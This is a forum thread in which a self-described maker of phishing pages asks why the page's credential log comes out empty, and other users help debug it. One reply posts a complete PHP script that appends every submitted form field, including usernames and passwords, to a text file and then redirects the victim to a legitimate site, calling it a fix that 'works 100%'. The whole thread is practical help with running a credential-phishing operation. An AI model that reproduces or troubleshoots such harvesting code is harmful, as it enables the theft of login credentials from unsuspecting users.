Phisher228 Posted March 19, 2014 Share Posted March 19, 2014 Ive made many phishers, but for some reason, this one won't show any text in the log.txt. I make the index with action=next.php and replace that with the login link. But. Something is wrong with the index, because all is working fine when they login, except in the log.txt that pops up, no text is shown. It's just blank. Could someone look at the index and see what's wrong, or help me fix it, or what to do? Thanks. Quote Link to comment Share on other sites More sharing options...
THCMinister Posted March 19, 2014 Share Posted March 19, 2014 What are the file permission? It could be a write permission issue for the log. Quote Link to comment Share on other sites More sharing options...
Cyberzaba Posted July 14, 2014 Share Posted July 14, 2014 <?php header ('Location:http://www.example.com'); $handle = fopen("usernames.txt", "a"); foreach($_POST as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?> This works 100% Quote Link to comment Share on other sites More sharing options...
Black-Assassin Posted July 16, 2014 Share Posted July 16, 2014 make sure that your "next.php" is writing into the log.txt file b/c the index page is just passing the USER and PASS to the "next.php" and write it to the log I think next.php is your problem. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.